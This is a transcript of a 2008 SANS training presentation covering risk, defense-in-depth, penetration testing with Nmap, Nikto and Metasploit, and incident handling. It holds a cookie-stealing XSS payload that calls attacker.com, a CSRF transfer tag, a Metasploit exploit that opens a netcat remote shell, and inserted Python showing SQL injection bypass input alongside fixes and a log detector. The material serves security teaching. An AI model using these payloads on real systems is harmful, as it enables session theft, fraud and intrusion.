Frontline solutions For Security Practitioners 1008

Frontline Solutions for Security Practitioners SANS/GIAC 2008® Frontline Solutions for Security Practitioners A presentation of The Internet Storm Center, The SANS Institute and The GIAC Certification Program

Description: A 2-hour presentation first given at the CIPS ICE conference in October 2008.

Transcript of Frontline solutions For Security Practitioners 1008

Page 1: Frontline solutions For Security Practitioners 1008

Frontline Solutions for Security Practitioners SANS/GIAC 2008®

Frontline Solutions for Security Practitioners

A presentation of The Internet Storm Center, The SANS Institute and The GIAC Certification Program

Page 2: Frontline solutions For Security Practitioners 1008

Program Overview - GIAC Certification © 2006Frontline Solutions for Security Practitioners SANS/GIAC 2008® 2

About Me: Rick Wanner B.Sc. I.S.P.

• Client Technology Manager, Security at SaskTel
• Areas of expertise
  – Secure Network Architecture, Penetration Testing
  – IDS, Policy Development and compliance
• Masters Student at STI (SANS Technology Institute)
• Handler at the Internet Storm Center (isc.sans.org)
• Independent contractor/Volunteer with SANS/GIAC
• [email protected]

Page 3: Frontline solutions For Security Practitioners 1008


The Internet Storm Center

• The Internet Storm Center acts as a distributed early warning system for the Internet
• The ISC’s principal inputs come from Dshield.org and Internet users
• The ISC acts as an intermediary with ISPs worldwide.
• The ISC is composed of approximately 40 volunteer handlers who coordinate a group of volunteer intrusion analysts and malware specialists.
• Daily blog/diary published at http://isc.sans.org/
• Sponsored by the SANS Institute.

Page 4: Frontline solutions For Security Practitioners 1008


SANS Training and GIAC Certifications

• SANS Institute is the leading training organization for system administration, audit, network, security and security management.

• GIAC, The Global Information Assurance Certification program, provides assurance that a certified individual meets a minimum level of ability and possesses the skills necessary to do the job.

Page 5: Frontline solutions For Security Practitioners 1008


Today’s Cyber Threats

• Cyber threats have certainly changed since Al Gore invented the internet.

• What started off as an innocuous invention by ARPANET and supported by the U.S. Department of Defense, is now a significant vehicle for conducting business, shopping, banking, researching, communicating, and maintaining vital corporate information

• Unfortunately it’s also a haven for hackers and intrusive malicious code.

Page 6: Frontline solutions For Security Practitioners 1008


The Internet

• The Internet is a community of individuals with its good neighbourhoods and bad neighbourhoods.
• In this community the bad neighbourhoods are only separated from the good neighbourhoods by at most 150 milliseconds.

Page 7: Frontline solutions For Security Practitioners 1008


The Need for Information Security

• While you are working hard to protect your organization’s critical information and systems, there are others out there who want to compromise it.

• Learning the appropriate actions to secure this information not only benefits your employer, clients, and stockholders, it benefits you.

• In this industry, you don’t want to be the one who learned the hard way.

Page 8: Frontline solutions For Security Practitioners 1008


Security Outlook

• As users get more sophisticated, so do the bad guys.
• A CA, Inc. report issued on January 29, 2007 stated that:
  – In 2006, trojans accounted for 62% of all malware; worms 24%; and viruses and other types of malware accounted for the remaining 13%.
• CA, Inc. predicts that attackers will use blended threats to steal private information and perpetrate other attacks
  – Phishers are getting smarter
  – Spam will increase
  – Targeted attacks will increase
  – A rise in the use of kernel rootkits
  – Increased exploitation of browser and application vulnerabilities
  – Typo-squatting on search engines will increase
  – Attacks are increasingly sophisticated.

Page 9: Frontline solutions For Security Practitioners 1008


Presentation Overview

• A brief look at risk
• Security Mitigation Strategies
  – Defense-in-Depth
  – Penetration Testing
  – Incident Handling

Page 10: Frontline solutions For Security Practitioners 1008


Focus of Security is Risk

• Security deals with managing risk to your critical assets
• Security is basically an exercise in loss reduction
• It’s impossible to totally eliminate risk – we settle for residual risk
• Risk is the probability of a threat crossing or touching a vulnerability
• Risk is managed by applying security controls
• Risk = threat x vulnerabilities

Page 11: Frontline solutions For Security Practitioners 1008


Key Focus of Risk

• Confidentiality/Disclosure
• Integrity/Alteration
• Availability/Destruction

(Figure: the CIA triad – Confidentiality, Integrity, Availability)

Page 12: Frontline solutions For Security Practitioners 1008


Prioritizing CIA

• While all three areas of CIA are important to an organization, there is always one area that is more critical than the others
• Confidentiality
  – Health care organizations
  – Hospitals
• Integrity
  – Financial institutions
  – Banks
• Availability
  – E-commerce-based organizations
  – Online banking

Page 13: Frontline solutions For Security Practitioners 1008


What is a Threat?

• Possible danger
• Protect against the ones that are most likely or most worrisome based on:
  – Intellectual property
  – Business goals
  – Validated data
  – Past history
  – Main point of exposure

(Figure: 5 Primary Threats – Malware, Insider, Health Epidemic, Natural Disasters, Terrorism)

Page 14: Frontline solutions For Security Practitioners 1008


Vulnerabilities

• Vulnerabilities are weaknesses in a system
• Vulnerabilities are inherent in complex systems; they will always be present
• The majority of vulnerabilities are the result of poor coding practices
  – Lack of error checking
• Vulnerabilities are the gateway by which threats are manifested
• Vulnerabilities fall into two categories
  – Known – those you can protect against
  – Unknown or “zero day”

Page 15: Frontline solutions For Security Practitioners 1008


Defense-in-Depth

• We deploy Defense-in-Depth to manage and mitigate risk.

Page 16: Frontline solutions For Security Practitioners 1008


What is Defense-in-Depth?

• There is no “silver bullet” when it comes to network security
• Any layer of protection might fail
• Multiple levels of protection must be deployed
• Measures must be across a wide range of controls (preventive and detective)

Page 17: Frontline solutions For Security Practitioners 1008


Approach to Defense-in-Depth

• Deploy measures to reduce, eliminate, or transfer risk
• Four basic approaches
  – Uniform protection
  – Protected enclaves
  – Information centric
  – Threat vector analysis

Page 18: Frontline solutions For Security Practitioners 1008


Uniform Protection Defense-in-Depth

• Most common approach to DiD
• Firewall, VPN, Intrusion Detection, Antivirus, etc.
• All parts of the organization receive equal protection
• Particularly vulnerable to malicious insider attacks

Page 19: Frontline solutions For Security Practitioners 1008


Protected Enclaves Defense-in-Depth

• Work groups that require additional protection are segmented from the rest of the internal organization
• Restricting access to critical segments
• DOE “unclean” network
• System of VPNs
• Internal Firewalls
• VLANs and ACLs

Page 20: Frontline solutions For Security Practitioners 1008


Information Centric Defense-in-Depth

• Identify critical assets and provide layered protection
• Data is accessed by applications
• Applications reside on hosts
• Hosts operate on networks

(Figure: nested layers – Info, Application, Host, Network)

Page 21: Frontline solutions For Security Practitioners 1008


Vector-Oriented Defense-in-Depth

• The threat requires a vector to cross the vulnerability
• Stop the ability of the threat to use the vector:
  – USB Thumb Drives – Disable USB
  – Floppy Drives – Disable
  – Auto Answer Modems – Digital phone PBX

Page 22: Frontline solutions For Security Practitioners 1008


Identity, Authentication, Authorization, and Accountability

• Identity is who you claim to be
• Authentication is a process by which you prove you are who you say you are:
  – Something you know
  – Something you have
  – Something you are
  – Some place you are
• Authorization is determining what someone has access to or is allowed to do after authentication
• Accountability deals with knowing who did what and when

Page 23: Frontline solutions For Security Practitioners 1008


Controlling Access

• Least Privilege
  – Give someone the least amount of access required to do their job
• Need to Know
  – Only give them the access when they need it – and take it away when it is no longer required
• Separation of Duties
  – Break critical tasks across multiple people to limit your points of exposure
• Rotation of Duties
  – Change jobs on a regular basis to prevent anyone from being able to get comfortable in a position and therefore be able to cover their tracks

Page 24: Frontline solutions For Security Practitioners 1008


“Protection is ideal, detection is a must”

• You cannot protect against every possible threat.

• Instrument your security so that you can detect the threat, or at the very least so you have data available to analyze the attack after the fact.
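As an added example (not part of the deck), the following Python script shows what that instrumentation can look like for the web attacks demonstrated later in this presentation: it parses Apache common-log lines and flags three footprints. The sample log, the rule names and the list of state-changing endpoints are constructed for the example, modelled on the XSS and XSRF "Result" lines shown on later slides.

```python
"""Detection over web server logs: footprints of the XSS and XSRF demos later in this deck.
Added example; the sample log, rule names and endpoint list are constructed."""
import re
from typing import Iterable, List, Optional, Tuple
from urllib.parse import unquote

# Apache common log format, the layout of the deck's "Result" lines. The optional
# space after the method tolerates lines extracted as "GET/PHPSESSID=...".
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) ?(?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$')

# Session cookie names that should only ever travel in the Cookie header.
SESSION_PARAMS = ("PHPSESSID", "JSESSIONID", "ASP.NET_SessionId", "sessionid")
# Constructed list of endpoints that change state and must only be reached by POST.
STATE_CHANGING = ("/transaction.php", "/transfer", "/change_password")

# Constructed sample log modelled on the deck's XSS and XSRF result lines.
SAMPLE_LOG = """\
192.168.231.131 - - [21/Jan/2008:10:36:02 -0500] "GET /search.php?q=%3Cscript%3Edocument.write(document.cookie)%3C/script%3E HTTP/1.1" 200 1820
192.168.231.131 - - [21/Jan/2008:10:36:31 -0500] "GET /PHPSESSID=b37a25a01745b6d2a5df876e45dabf60 HTTP/1.1" 404 240
192.168.231.131 - - [21/Jan/2008:12:33:31 -0500] "GET /transaction.php?src_acct=0128428&dst_acct=0183718&amount=5000 HTTP/1.1" 200 2240
192.168.231.140 - - [21/Jan/2008:12:35:02 -0500] "POST /transaction.php HTTP/1.1" 200 2240
192.168.231.140 - - [21/Jan/2008:12:36:10 -0500] "GET /index.php?q=firewall HTTP/1.1" 200 5120
"""


def parse_clf(line: str) -> Optional[dict]:
    """Split one common-log line into fields, or None if it does not parse."""
    m = CLF.match(line.strip())
    return m.groupdict() if m else None


def check_request(rec: dict) -> List[str]:
    """Names of the detection rules one parsed request matches (may be empty)."""
    hits: List[str] = []
    path = rec["path"]
    decoded = unquote(path).lower()
    # 1. Reflected XSS attempt: script markup arriving inside a request to your app.
    if "<script" in decoded:
        hits.append("script-in-request")
    # 2. A session id in the URL: the cookie-theft <img src=...> lands exactly like
    #    this on whichever server receives it, and a proxy log shows it leaving.
    if any(name.lower() + "=" in decoded for name in SESSION_PARAMS):
        hits.append("session-id-in-url")
    # 3. A state-changing action over GET is how the forged <img> request arrives.
    if rec["method"] == "GET" and path.split("?", 1)[0] in STATE_CHANGING:
        hits.append("state-change-over-get")
    return hits


def scan_log(lines: Iterable[str]) -> List[Tuple[str, str, List[str]]]:
    """Run every rule over every parsable line; return (client ip, path, rules hit)."""
    findings = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            continue          # unparsable lines are skipped, not silently accepted
        hits = check_request(rec)
        if hits:
            findings.append((rec["ip"], rec["path"], hits))
    return findings


if __name__ == "__main__":
    for ip, path, rules in scan_log(SAMPLE_LOG.splitlines()):
        print(ip, path, rules)
```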

Page 25: Frontline solutions For Security Practitioners 1008


Penetration Testing

• Penetration testing is discovering vulnerabilities in your networks, systems, applications and data before the bad guys do.

• Penetration testing simulates the generalized attack methodology.

Page 26: Frontline solutions For Security Practitioners 1008


Generalized Attack Methodology

• Reconnaissance
• Scanning
• Gaining Access
• Maintaining Access
• Covering Tracks

Page 27: Frontline solutions For Security Practitioners 1008


Penetration Testing Method

• Preparation
• Reconnaissance
• Scanning
• Exploitation
• Analysis
• Reporting

Page 28: Frontline solutions For Security Practitioners 1008


Preparation

• Define the parameters of the test.
  – Objectives
  – Scope
  – Roles and responsibilities
  – Limitations
  – Success factors
  – Timeline
  – Documented Permission

Page 29: Frontline solutions For Security Practitioners 1008


Reconnaissance

• Reconnaissance determines: “What can a potential attacker learn about your company?”

• Utilizes publicly available information.

Page 30: Frontline solutions For Security Practitioners 1008


Reconnaissance (2)

• Some sources of information:
  – Search Engines
  – Websites
  – Registrars
  – SEC
  – Recruiting sites
  – Netcraft.com

Page 31: Frontline solutions For Security Practitioners 1008


Reconnaissance (3) - Netcraft

Page 32: Frontline solutions For Security Practitioners 1008


Reconnaissance (4) - Netcraft

Page 33: Frontline solutions For Security Practitioners 1008


Scanning

• Now we know where to look, let’s dig in a little deeper.
• Generally you are going to use two types of scanners: port scanners and vulnerability scanners.
• The hacker’s choice:
  – Nmap
  – Nessus

Page 34: Frontline solutions For Security Practitioners 1008


Nmap

• Nmap – open source port scanner
• Usually start with discovery scans and progress to targeted scans.
• Runs on Windows and *nix.
• Available from nmap.org

Page 35: Frontline solutions For Security Practitioners 1008


Nmap - Discovery

• nmap -F <Address>
• nmap -F 192.168.1.0/24
  (-F is fast mode: scans fewer ports than the default scan)

Page 36: Frontline solutions For Security Practitioners 1008


Nmap - Targeted

• nmap -F -A <address>
• nmap -F -A 192.168.1.200
  (-A enables OS detection, version detection, script scanning and traceroute)

Page 37: Frontline solutions For Security Practitioners 1008


Vulnerability Scanner

• Nessus – open source VA scanner
• Vulnerability feed costs money.

Page 38: Frontline solutions For Security Practitioners 1008


Commercial Vulnerability Scanners

Rapid7 NeXpose
GFI LANguard
eEye Retina Network

Page 39: Frontline solutions For Security Practitioners 1008


Application Attacks

• Now we have all these layers of protection. Are you still vulnerable?

• The fact is that you can’t deny what you must permit.

• What about application level attacks?

Page 40: Frontline solutions For Security Practitioners 1008


Cross-Site Scripting

• Allows code injection by malicious web users into the web pages viewed by other users.

• Root cause - lack of input filtering and validation

• Permits the attacker to execute arbitrary scripts in the victim’s browser

Page 41: Frontline solutions For Security Practitioners 1008


Cross Site Scripting (2)

• Code
  <script>document.write('<img src=http://www.attacker.com/' + document.cookie + '>')</script>

• Result (access log of the attacker’s web server)
  192.168.231.131 - - [21/Jan/2008:10:36:31 -0500] "GET /PHPSESSID=b37a25a01745b6d2a5df876e45dabf60 HTTP/1.1" 404 240
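The root cause named on the previous slide is output that is placed into the page without encoding. As an added example (not code from the deck), here is the same thing in Python from the defender's side: a page that concatenates a user-supplied search term, the same page with HTML encoding applied, and the HttpOnly cookie attribute that keeps the session cookie out of document.cookie even when a script does run. PAYLOAD is the deck's injected code; the function names and the page template are assumptions.

```python
"""Reflected XSS: vulnerable rendering vs. output encoding (added example)."""
import html

# The cookie-stealing payload from the slide above, used here only as test input.
PAYLOAD = ("<script>document.write('<img src=http://www.attacker.com/'"
           " + document.cookie + '>')</script>")

# Constructed page template; {term} is where the user's input is placed.
PAGE_TEMPLATE = "<html><body><h1>Results for: {term}</h1></body></html>"


def render_vulnerable(term: str) -> str:
    """Root cause: user input is pasted into the page with no encoding,
    so any markup in `term` becomes live HTML in the victim's browser."""
    return PAGE_TEMPLATE.format(term=term)


def render_safe(term: str) -> str:
    """Mitigation: encode the HTML metacharacters (<, >, &, ", ') before the
    value lands in an HTML text context. The browser then displays the
    payload as text instead of executing it."""
    return PAGE_TEMPLATE.format(term=html.escape(term, quote=True))


def contains_live_script(page: str) -> bool:
    """Crude check used to show the difference: is there a real, unencoded
    <script> tag in the rendered page?"""
    return "<script" in page.lower()


def validate_search_term(term: str, max_len: int = 64) -> bool:
    """Input validation ("every input should be validated"): a search term
    is expected to be short and printable with no angle brackets. This
    complements output encoding; it does not replace it."""
    return (0 < len(term) <= max_len and term.isprintable()
            and not any(c in "<>" for c in term))


def session_cookie_header(session_id: str, secure: bool = True) -> str:
    """Defence in depth for the cookie-theft demo: an HttpOnly cookie is not
    visible to document.cookie, so the injected script has nothing to send.
    Secure keeps the cookie off plain-HTTP connections."""
    flags = ["Path=/", "HttpOnly"]
    if secure:
        flags.append("Secure")
    return "Set-Cookie: PHPSESSID=%s; %s" % (session_id, "; ".join(flags))


if __name__ == "__main__":
    print("vulnerable page executes script:", contains_live_script(render_vulnerable(PAYLOAD)))
    print("encoded page executes script:   ", contains_live_script(render_safe(PAYLOAD)))
    # Session id taken from the deck's example log line.
    print(session_cookie_header("b37a25a01745b6d2a5df876e45dabf60"))
```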

Page 42: Frontline solutions For Security Practitioners 1008


Cross-Site Scripting (3)

Page 43: Frontline solutions For Security Practitioners 1008


Yahoo's HotJobs site vulnerable to cross-site scripting attack

Dan Kaplan - October 27 2008

Internet research firm Netcraft's toolbar has detected a cross site scripting bug in Yahoo that could be exploited to steal authentication cookies.

The flaw resides on Yahoo's HotJobs search engine site, on which hackers embedded malicious JavaScript code, Netcraft's Paul Mutton said in a blog post on Sunday.

"The script steals the authentication cookies that are sent for the Yahoo.com domain and passes them to a different website in the United States, where the attacker is harvesting stolen authentication details," Mutton wrote.

The pilfered credentials could enable the attackers access to the victims' Yahoo accounts, including email. This vulnerability is similar to another bug that affected Yahoo earlier this year, he said.

"Simply visiting the malign URLs on Yahoo.com can be enough for a victim to fall prey to the attacker, letting him steal the necessary session cookies to gain access to the victim's email — the victim does not even have to type in their username and password for the attacker to do this," Mutton wrote. "Both attacks send the victim to a blank webpage, leaving them unlikely to realize that their own account has just been compromised."

Page 44: Frontline solutions For Security Practitioners 1008


Cross Site Scripting Demo

• Steals the session cookie and then masquerades as the user.

Page 45: Frontline solutions For Security Practitioners 1008


Cross-Site Request Forgery (XSRF)

• Unauthorized commands are transmitted from a user that the website trusts.

• Exploitation of an existing web session.

• Embedded code causes unauthorized actions

Page 46: Frontline solutions For Security Practitioners 1008


XSRF (2)

• Code
  <img src=http://www.acmefinancial.com/transaction.php?src_acct=0128428&dst_acct=0183718&amount=5000>

• Result
  192.168.231.131 - - [21/Jan/2008:12:33:31 -0500] "GET /transaction.php?src_acct=0128428&dst_acct=0183718&amount=5000 HTTP/1.1" 200 2240
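As an added example (not the deck's code), the following Python models the transaction.php handler above and then its hardened form: state changes only over POST, and the form must carry a per-session synchronizer token that a page on another site cannot read. The session store, the Request class, the account numbers and the function names are constructed for the example.

```python
"""Cross-Site Request Forgery: the deck's GET transfer vs. a token-checked handler (added example)."""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Tuple

# Constructed server-side session store: session id -> session data.
SESSIONS: Dict[str, dict] = {
    "sess-alice": {"user": "alice", "balances": {"0128428": 9000}},
}


@dataclass
class Request:
    """Minimal stand-in for an HTTP request as a handler would see it."""
    method: str
    params: Dict[str, str]                        # query string or form fields
    cookies: Dict[str, str] = field(default_factory=dict)


def transfer_vulnerable(req: Request) -> Tuple[int, str]:
    """Mirrors the slide's transaction.php: any request carrying the victim's
    session cookie is honoured, including a GET fired by an <img> tag on a
    page the attacker controls (the browser attaches the cookie on its own)."""
    sess = SESSIONS.get(req.cookies.get("PHPSESSID", ""))
    if sess is None:
        return 403, "not logged in"
    amount = int(req.params["amount"])
    sess["balances"][req.params["src_acct"]] -= amount
    return 200, "transferred %d" % amount


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token: a random value stored in the session and echoed into
    the legitimate transfer form. Same-origin policy keeps it from other sites."""
    token = secrets.token_hex(16)
    SESSIONS[session_id]["csrf"] = token
    return token


def transfer_hardened(req: Request) -> Tuple[int, str]:
    """Two checks a forged <img> request cannot satisfy: the action must be
    POSTed, and the form must carry the token issued to this session."""
    sess = SESSIONS.get(req.cookies.get("PHPSESSID", ""))
    if sess is None:
        return 403, "not logged in"
    if req.method != "POST":
        return 405, "transfers must be POSTed"
    expected = sess.get("csrf", "")
    supplied = req.params.get("csrf_token", "")
    # Constant-time comparison; an empty stored token never matches.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "missing or invalid CSRF token"
    amount = int(req.params["amount"])
    sess["balances"][req.params["src_acct"]] -= amount
    return 200, "transferred %d" % amount


# The request the slide's <img> tag produces, as the server sees it.
FORGED = Request("GET",
                 {"src_acct": "0128428", "dst_acct": "0183718", "amount": "5000"},
                 cookies={"PHPSESSID": "sess-alice"})

if __name__ == "__main__":
    print("vulnerable handler:", transfer_vulnerable(FORGED))   # honoured
    print("hardened handler:  ", transfer_hardened(FORGED))     # rejected, 405
```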

Page 47: Frontline solutions For Security Practitioners 1008


SQL Injection Demo

• SQL statements are injected into user input to see if a response is returned.
• Extreme Defense in Depth
  – Firewall, network segmentation
  – System patching, SSL communications
• Results
  – Authentication Bypass
  – Unauthorized data access
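As an added example (not the deck's demo code), the following Python shows the two sides of the authentication bypass listed above: a login query assembled by string concatenation, and the parameterized version that makes the same input harmless. It runs against a constructed in-memory SQLite table; the user, password and injected string are constructed for the example.

```python
"""SQL injection authentication bypass: string-built query vs. parameterized query (added example)."""
import hashlib
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory user table standing in for the demo's login backend.
    (Unsalted SHA-256 is used only to keep the example short.)"""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("admin", hashlib.sha256(b"correct horse").hexdigest()))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Root cause: user input is concatenated into the SQL text, so a quote in
    the username changes the structure of the query instead of its data."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = ("SELECT username FROM users WHERE username = '%s' AND pw_hash = '%s'"
           % (username, pw_hash))
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Mitigation: parameterized query. The SQL text is fixed; the driver passes
    the values separately, so a quote is just a character in a string."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pw_hash = ?",
        (username, pw_hash)).fetchone()
    return row is not None


# Constructed input of the kind the demo sends in place of a username: it closes
# the quoted value, adds an always-true condition and comments out the rest.
INJECTED_USERNAME = "admin' OR '1'='1' --"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable login, injected username, wrong password:",
          login_vulnerable(db, INJECTED_USERNAME, "wrong"))      # True: bypassed
    print("parameterized login, same input:                     ",
          login_safe(db, INJECTED_USERNAME, "wrong"))            # False
```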

Page 48: Frontline solutions For Security Practitioners 1008


Preventing Web Application Attacks

• Every input should be validated!
• “Suspicion Breeds Confidence”
  – Test it!

Page 49: Frontline solutions For Security Practitioners 1008


Nikto

• Open source Linux based web application scanner

• Available at http://www.cirt.net/nikto2

Page 50: Frontline solutions For Security Practitioners 1008


Nikto (2)

• Basic Scan
  perl nikto.pl -h <host>
  perl nikto.pl -h 192.168.1.1

• Multiple ports
  perl nikto.pl -h 192.168.1.1 -p 80,88,443

Page 51: Frontline solutions For Security Practitioners 1008


Nikto – Simple Scan

[root@rwanner nikto]# ./nikto.pl -h localhost
- Nikto v2.03/2.04
---------------------------------------------------------------------------
+ Target IP:       127.0.0.1
+ Target Hostname: localhost
+ Target Port:     80
+ Start Time:      2008-10-27 21:53:47
---------------------------------------------------------------------------
+ Server: Apache/2.2.6 (Fedora)
- Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.2.9). Apache 1.3.39 and 2.0.61 are also current.
+ OSVDB-682: GET /usage/ : Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details
+ OSVDB-3092: GET /manual/ : Web server manual found.
+ OSVDB-3268: GET /icons/ : Directory indexing is enabled: /icons
+ OSVDB-3268: GET /manual/images/ : Directory indexing is enabled: /manual/images
+ OSVDB-3233: GET /icons/README : Apache default file found.
+ 3577 items checked: 9 item(s) reported on remote host
+ End Time:        2008-10-27 21:54:28 (41 seconds)

Page 52: Frontline solutions For Security Practitioners 1008


Nikto (3)

• Multiple hosts
  perl nikto.pl -h <filename>
  perl nikto.pl -h hosts.txt

• Hosts file
  192.168.1.1:80:443
  192.168.0.200
  192.168.0.200,443

Page 53: Frontline solutions For Security Practitioners 1008


Nikto – Multiple Hosts Scan

]# ./nikto.pl -h hosts.txt
- Nikto v2.03/2.04
---------------------------------------------------------------------------
+ Target IP:       192.168.1.1
+ Target Hostname: 192.168.1.1
+ Target Port:     443
---------------------------------------------------------------------------
+ SSL Info:        Ciphers: DES-CBC3-SHA
                   Info:    /C=US/ST=California/L=Irvine/O=Cisco-Linksys, LLC/OU=Division/CN=Linksys/[email protected]
                   Subject: /C=US/ST=California/L=Irvine/O=Cisco-Linksys, LLC/OU=Division/CN=Linksys/[email protected]
+ Start Time:      2008-10-28 21:16:37
---------------------------------------------------------------------------
+ Server: No banner retrieved

Page 54: Frontline solutions For Security Practitioners 1008


Commercial Web Scanners

IBM Rational AppScan
HP WebInspect
Cenzic Hailstorm

Page 55: Frontline solutions For Security Practitioners 1008


Exploitation

• Once you identify a potential vulnerability you have choices:
  – Can use individual exploits…available via the Internet
  – Can use pre-built exploitation frameworks.
• The most popular exploitation framework is Metasploit.
  – Available for Windows or Linux
  – Available at http://www.metasploit.com/

Page 56: Frontline solutions For Security Practitioners 1008


Metasploit

• 3 primary components
  – Exploit
    • Stack/Heap based buffer overflow
    • Insecure coding
    • PHP vulnerability, IIS Unicode, SQL injection, etc.
  – NOP sled (optional - exploit dependent)
  – Payload
    • Shellcode
    • Encoders
    • Other (exploit dependent)

Page 57: Frontline solutions For Security Practitioners 1008


Metasploit

# ./msfconsole                          (start Metasploit)
msf > use windows/dcerpc/ms03_026_dcom
msf > setg PAYLOAD windows/exec
msf > setg CMD nc -L -p 80 cmd.exe
msf > setg RHOST 192.168.0.2
msf > exploit

Page 58: Frontline solutions For Security Practitioners 1008


Exploitation Demo

• Patching and Configuration
  – Lacking patch management procedures
  – Single inbound port open through firewall
• Results
  – Simple remote exploitation
  – Worm characteristics
  – Can be used to bypass firewalls

Page 59: Frontline solutions For Security Practitioners 1008


Commercial Tools

Core Impact

Page 60: Frontline solutions For Security Practitioners 1008


Analysis

• When you finish you will have a mountain of data to analyze.

• Break it down by a risk based approach.

Page 61: Frontline solutions For Security Practitioners 1008


Reporting

• Base your report on risk.
• Write it so your senior executives can understand it.
• Provide recommendations based on standards or best practices.
• Keep the Executive summary short.
• Stay away from FUD!

Page 62: Frontline solutions For Security Practitioners 1008


Handling an Incident

• Now that you are aware of threats, let’s take a look at how to handle an incident once it occurs.

Page 63: Frontline solutions For Security Practitioners 1008


What Is Incident Handling?

• Incident Handling is an action plan for dealing with the misuse of computer systems and networks:
  – Intrusions
  – Malicious code infection
  – Cyber-theft
  – Denial of Service
  – Other security-related events
• Have written procedures and policies in place so you know what to do when an incident occurs.

Page 64: Frontline solutions For Security Practitioners 1008


Why is Incident Handling Important?

• Sooner or later an incident is going to occur
  – Do you know what to do?
• It is not a matter of “if” but “when”
• Planning is everything
• Similar to backups
  – You might not use them every day, but if a major problem occurs, you are going to be glad that you have them available

Page 65: Frontline solutions For Security Practitioners 1008


Incident Definition

• The term “incident” refers to an adverse event in an information system and/or network…

• …or the threat of the occurrence of such an event

• Focus is on detecting deviations from the normal state of the network and systems

• Examples of incidents include:
  – Unauthorized use of another user’s account
  – Unauthorized use of system privileges
  – Execution of malicious code that destroys data

• Incident implies harm, or the attempt to harm

Page 66: Frontline solutions For Security Practitioners 1008


Event Definition

• An “event” is any observable occurrence in a system and/or network

• Examples of events include:
  – The system boot sequence
  – A system crash (could be normal behavior for that system)
  – Packet flooding within a network (could be bursty legit traffic)
• These observable events provide the bulk of your organization’s case if the perpetrator of an incident is caught and prosecuted
  – Must be recorded in notebooks and logs
  – Recording the same event in multiple places helps improve evidence – that’s corroborating evidence

Page 67: Frontline solutions For Security Practitioners 1008


Incident Handling Phases

• Preparation
  – Create the incident handling team, implement policy, allocate resources
  – Prepare how incidents are communicated
• Identification
  – Detect incidents through alerts and audit logs on network perimeter, host perimeter, and host systems
  – Enforce a need-to-know policy
  – Out of band communications, such as cell phones, may be appropriate if the network has been compromised
• Containment
  – Stop the bleeding
  – Survey the situation and inform management

Page 68: Frontline solutions For Security Practitioners 1008


Incident Handling Phases

• Eradication
  – Remove artifacts of the incident and determine the cause
  – Perform a recovery from known-good backups (rebuild in the case of a rootkit installation)
  – Improve network and host defenses appropriately
• Recovery
  – Place the system back into production
  – Validate the system integrity and function
  – Monitor for further suspicious events
• Lessons Learned
  – Create a follow-up report and look for ways to improve the incident handling processes

Page 69: Frontline solutions For Security Practitioners 1008


Six Primary Phases

(Figure: the six phases in sequence: Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned. Transitions shown: Steady State, Declare an Incident, Start Clean-Up, Finish Clean-Up, Back in Production, Done, Steady State.)

On occasion, we may be forced to jump back…

Page 70: Frontline solutions For Security Practitioners 1008


Data Recovery Demo

• Incident Recovery
  – Data deleted from a system
  – Could be accidental or malicious
• Recovery Steps
  – Bit-for-bit image of storage device
  – Data recovery using Autopsy

Page 71: Frontline solutions For Security Practitioners 1008


Seven Deadly Sins (Chronological Order)

1. Failure to report or ask for help
2. Incomplete/non-existent notes
3. Mishandling/destroying evidence
4. Failure to create working backups
5. Failure to contain or eradicate
6. Failure to prevent re-infection
7. Failure to apply lessons learned

Page 72: Frontline solutions For Security Practitioners 1008


Incident Handling Summary

• Incident Handling is similar to first aid
• The caregiver is under pressure and mistakes can be costly
• A simple, well-understood, documented approach is best
• Keep the six stages in mind: Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned
• Use pre-designed forms, and ask for help
  – http://www.sans.org/score/incidentforms
  – Forms include Incident Contact List, Identification Checklist, Survey, Containment Checklist, Eradication Checklist, and Communication Log

Page 73: Frontline solutions For Security Practitioners 1008


Share Your Experiences

• If your computer policy will allow it, share what you have learned with other incident handlers and response teams
  – Attacks against computers are happening everywhere, all the time
  – The bad guys share information; if we incident handlers do not share with each other, they’ll stay a step ahead
  – Coordinating your efforts with those on other teams is a critical facet of incident response
  – Do as they told you in kindergarten: Share
  – The Internet Storm Center (isc.sans.org) is a wonderful point of communication. A handler is on duty every day

Page 74: Frontline solutions For Security Practitioners 1008


How To Apply This Information

• This material is a starting point to create a set of incident handling procedures tailored to your environment

• Remember, incident handling is not a “one-size-fits-all” activity
  – But there are common principles we all must consider

• As you work through the process, ask yourself:
  – “If an incident occurred, would I be really thankful I had done that?”
  – “Would I be really sorry if I hadn’t done that?”

Page 75: Frontline solutions For Security Practitioners 1008


Presentation Summary

• Security programs should be about risk, not technology, not FUD.

• “Protection is ideal, detection is a must.”

• Know what the attackers know.

• Be prepared for when an attack does come.

Page 76: Frontline solutions For Security Practitioners 1008


What We’ve Learned

• The information you have learned today comes from three of SANS’ most popular security courses.

• Defense-in-Depth is part of SEC401: Security Essentials - Bootcamp Style or GSEC

